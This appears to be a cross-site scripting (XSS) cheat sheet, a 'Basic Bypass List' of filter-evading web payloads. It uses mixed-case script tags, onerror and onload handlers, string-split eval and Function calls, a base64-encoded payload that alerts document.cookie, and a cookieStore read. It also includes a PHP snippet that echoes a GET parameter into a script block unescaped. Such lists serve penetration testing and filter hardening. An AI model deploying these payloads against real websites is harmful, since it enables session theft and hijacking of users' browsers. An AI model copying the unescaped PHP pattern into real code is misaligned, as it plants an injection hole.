
Cross-Site Scripting (XSS)

Basic Bypass List

<sCrIpt>alert(1)</ScRipt>
<script x>
<script x>alert('XSS')<script y>
<script x><script x>alert('XSS')<script y>
eval('ale'+'rt(0)');Function("ale"+"rt(1)")();new Function`al\ert\`6\``;setTimeout('ale'+'rt(2)');setInterval('ale'+'rt(10)');Set.constructor('ale'+'rt(13)')();Set.constructor`al\x65rt\x2814\x29```;
<img src='1' onerror='alert(0)' <
String.fromCharCode(88,83,83)
http://localhost/bla.php?test=</script><script>alert(1)</script>
<html>
  <script>
    <?php echo 'foo="text '.$_GET['test'].'";'; ?>
  </script>
</html>
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
<script>window['alert'](document['domain'])</script>
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
alert`1`
setTimeout`alert\u0028document.domain\u0029`;
<img/src='1'/onerror=alert(0)>
<svg
onload
=
alert(1)
>
"><svg/onload=confirm(1)>"@x.y
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
window["doc"+"ument"]
window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
<script>foo="text </script><script>alert(1)</script>";</script>
<svg onload=alert(1)//
\\\';alert(1);//
&apos;-alert(1)-&apos;
${alert(document.domain)}
<><img src=1 onerror=alert(1)>

PortSwigger Cheat Sheet

Cheat Sheet